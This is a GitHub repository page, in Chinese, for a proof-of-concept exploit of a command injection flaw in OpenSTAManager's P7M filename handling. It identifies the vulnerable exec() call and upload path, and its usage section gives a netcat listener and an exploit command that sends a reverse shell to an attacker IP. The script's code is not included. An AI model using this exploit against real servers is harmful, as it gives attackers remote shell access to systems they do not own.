tohib09/CVE-2025-69212-PoC

GitHub: tohib09/CVE-2025-69212-PoC

针对 OpenSTAManager <= 2.9.8 中由 .p7m 文件名未经过滤导致 OS 命令注入的 CVE-2025-69212 漏洞利用脚本。

Stars: 4 | Forks: 0

# CVE-2025-69212 — OpenSTAManager P7M 命令注入 PoC OpenSTAManager <= 2.9.8 — 通过 ZIP 上传中的恶意 .p7m 文件名实现 OS 命令注入。 **文件:** `src/Util/XML.php:100` — `exec()` 中未过滤的 `$file` **攻击向量:** `/plugins/importFE_ZIP/actions.php` → ZIP → `.p7m` 文件名 → `exec("openssl smime ... -in \"$file\" ...")` ## 用法 ``` # Listener nc -lvnp 4444 # Exploit python3 CVE-2025-69212.py http://target.htb YOUR_PHPSESSID 10.10.14.X 4444 ``` ## 参考 - https://github.com/advisories/GHSA-25fp-8w8p-mx36 - https://nvd.nist.gov/vuln/detail/CVE-2025-69212 # CVE-2025-69212-PoC
标签:CISA项目, PoC, 命令注入, 安全测试工具, 暴力破解, 逆向工具